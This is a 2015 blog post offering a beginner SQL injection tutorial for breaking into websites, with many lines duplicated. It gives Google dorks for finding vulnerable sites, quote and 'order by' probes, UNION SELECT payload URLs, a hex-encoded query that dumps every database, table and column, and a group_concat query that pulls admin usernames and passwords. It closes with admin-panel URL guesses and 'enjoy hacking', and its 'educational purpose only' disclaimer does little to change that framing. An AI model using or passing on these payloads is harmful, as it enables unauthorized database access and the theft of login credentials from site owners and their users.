17 February 2015
Basic of sql injection tutorial
Hello to all :D i am nob here i will show you how to hack any websites using sql injection
Hello to all :D i am nob here i will show you how to hack any websites using sql injection
What is SQL Injection?
SQL injection is one of the popular web application hacking method. Using the SQL Injection attack, an unauthorized person can access the database of the website. Attacker can extract the data from the Database.
SQL injection is one of the popular web application hacking method. Using the SQL Injection attack, an unauthorized person can access the database of the website. Attacker can extract the data from the Database.
What a hacker can do with SQL Injection attack?
* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server
Step 1: Finding Vulnerable Website:
To find a SQL Injection vulnerable site, you can use Google search by searching for certain keywords. Those keyword often referred as 'Google dork'.
To find a SQL Injection vulnerable site, you can use Google search by searching for certain keywords. Those keyword often referred as 'Google dork'.
Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
etc.etc you can google it for dorks
for eg:
www.site.com inurl:index.php?id=
Step 2: Checking the Vulnerability:
Now let us check the vulnerability of the target website. To check the vulnerability , add the single quotes(') at the end of the url and hit enter.
Now let us check the vulnerability of the target website. To check the vulnerability , add the single quotes(') at the end of the url and hit enter.
For eg:
http://www.site.com/index.php?id=2'
If the page remains in same page or showing that page not found, then it is not vulnerable.
If you got an error message just like this, then it means that the site is vulnerable
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Step 3: Finding Number of columns:
Great, we have found that the website is vulnerable to SQLi attack. Our next step is to find the number of columns present in the target database.
Great, we have found that the website is vulnerable to SQLi attack. Our next step is to find the number of columns present in the target database.
For that replace the single quotes(') with "order by n" statement.
Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".
For eg:
http://www.site.com/index.php?id=2 order by 1
http://www.site.com/index.php?id=2 order by 2
http://www.site.com/index.php?id=2 order by 3
http://www.site.com/index.php?id=2 order by 4
If you get the error while trying the "x"th number,then no of column is "x-1".
I mean:
http://www.site.com/index.php?id=2 order by 1(noerror)
http://www.site.com/index.php?id=2 order by 2(noerror)
http://www.site.com/index.php?id=2 order by 3(noerror)
http://www.site.com/index.php?id=2 order by 4(noerror)
http://www.site.com/index.php?id=2 order by 5(noerror)
http://www.site.com/index.php?id=2 order by 6(noerror)
http://www.site.com/index.php?id=2 order by 7(noerror)
http://www.site.com/index.php?id=2 order by 8(error)
so now x=8 , The number of column is x-1 i.e, 7.
In case ,if the above method fails to work for you, then try to add the "--" at the end of the statement.
For eg:
For eg:
http://www.site.com/index.php?id=2 order by 1--
Step 4: Find the Vulnerable columns:
We have successfully discovered the number of columns present in the target database. Let us find the vulnerable column by trying the query "union select columns_sequence".
We have successfully discovered the number of columns present in the target database. Let us find the vulnerable column by trying the query "union select columns_sequence".
Change the id value to negative(i mean
id=-2). Replace the columns_sequence with the no from 1 to x-1(number
of columns) separated with commas(,).
For eg:
if the number of columns is 7 ,then the query is as follow:
if the number of columns is 7 ,then the query is as follow:
http://www.site.com/index.php?id=-2 union select 1,2,3,4,5,6,7--
If the above method is not working then try this:
http://www.site.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--
Once you execute the query, it will display the vulnerable column.
Bingo,
column '1',2,3, and '4' are found to be vulnerable. Let us take the
first vulnerable column '3' . We can inject our query in this column.
Step 5:
finding the table name & as well as cloumn :D
use this query to find the DATABASE,TABLES,COLUMN at a time
www.site.com/index.php?id=-2 UNION SELECT
1,2,concat(0x3c62723e3c62723e3c2f666f6e743e3c7461626c6520626f726465723d2231223e3c74686561643e3c74723e3c74683e44617461626173653c2f74683e3c74683e5461626c653c2f74683e3c74683e436f6c756d6e3c2f74683e3c2f74686561643e3c2f74723e3c74626f64793e,(select
(@x) from (select (@x:=0x00),(select (0) from
(information_schema.columns) where
(table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in
(@x:=concat(@x,0x3c74723e3c74643e3c666f6e7420636f6c6f723d7265642073697a653d333e266e6273703b266e6273703b266e6273703b,table_schema,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e266e6273703b266e6273703b266e6273703b,table_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75652073697a653d333e,column_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c2f74723e))))x)),4,5,6,7--
result will be like this
Now replace the " whole query with the group_concat(column1,0x3a,column2)" with the "from table_name"
For eg:
http://www.site.com/index.php?id=-2
and 1=2 union select 1,2,group_concat(username,0x3a,password),4,5,6,7 from admin--
If the above query displays the 'column is not found' erro, then try another column name from the list.
If we got luck, then it will display the
data stored in the database depending on your column name. For
instance, username and password column will display the login
credentials stored in the database.
Step 8: Finding the Admin Panel:
Just try with url like:
Just try with url like:
http://www.site.com/admin.php
http://www.site.com/admin/
http://www.site.com/admin.html
http://www.site.com:2082/
etc.
If you got luck ,you will find the admin page using above urls. or you can some kind of admin finder tools.
If you got luck ,you will find the admin page using above urls. or you can some kind of admin finder tools.
Warning:
The above post is completely for educational purpose only. Never attempt to follow the above steps against third-party websites.
The above post is completely for educational purpose only. Never attempt to follow the above steps against third-party websites.
:D enjoy hacking
Subscribe to:
Post Comments (Atom)
0 comments